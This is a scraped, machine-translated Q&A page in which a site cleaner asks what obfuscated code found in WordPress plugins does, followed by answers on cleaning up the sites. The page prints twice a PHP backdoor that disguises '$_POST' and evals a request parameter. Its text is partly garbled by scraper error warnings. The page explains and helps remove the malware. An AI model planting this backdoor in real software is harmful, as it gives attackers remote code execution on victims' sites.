Warning: file_get_contents(/data/phpspider/zhask/data//catemap/1/wordpress/13.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Php Wordpress恶意代码,它实际上做什么?_Php_Wordpress - Fatal编程技术网

Php Wordpress恶意代码,它实际上做什么?

Php Wordpress恶意代码,它实际上做什么?,php,wordpress,Php,Wordpress,所以,今天我清理了一些我客户的网站,发现在很多wordpress插件上有很多整洁的恶意代码 有些是非常整洁的=D,但其中最好的一个是老把戏,在后面放很多缩进,然后打开另一个1安装新的wordpress.new 2下载所有新插件 3连接旧数据库 4添加所有上传介质 5检查您的theam&template和Js文件 查找并替换 首先检查你的Wordpress版本,并从Wordpress.org下载相同的版本。用最新下载的文件替换您的wp admin、wp include和root文件。一旦你这样做,

所以,今天我清理了一些我客户的网站,发现在很多wordpress插件上有很多整洁的恶意代码


有些是非常整洁的=D,但其中最好的一个是老把戏,在后面放很多缩进,然后打开另一个1安装新的wordpress.new 2下载所有新插件 3连接旧数据库 4添加所有上传介质 5检查您的theam&template和Js文件

查找并替换


首先检查你的Wordpress版本,并从Wordpress.org下载相同的版本。用最新下载的文件替换您的wp admin、wp include和root文件。一旦你这样做,恶意软件只会留在你的插件和主题。所以,下一步只需升级最新的插件,它将完成从插件以及

为了检查他们,你可以扫描任何防病毒软件,它会找到恶意代码。您可以手动删除所有文件中几乎相同的代码


希望这会有帮助

它评估$_POST['q571d85']中的任何代码。仅供参考,像数组一样访问它只返回字符串的字符。不使用strtoupper,只使用大写字母。看@lawrencerone:是的,我知道,我意识到了错误,所以我编辑了我的答案,谢谢你的解释:D
$qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q571d85'])) {
eval(${$s20}['q571d85']);
}
 $qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q571d85'])) {
eval(${$s20}['q571d85']);
}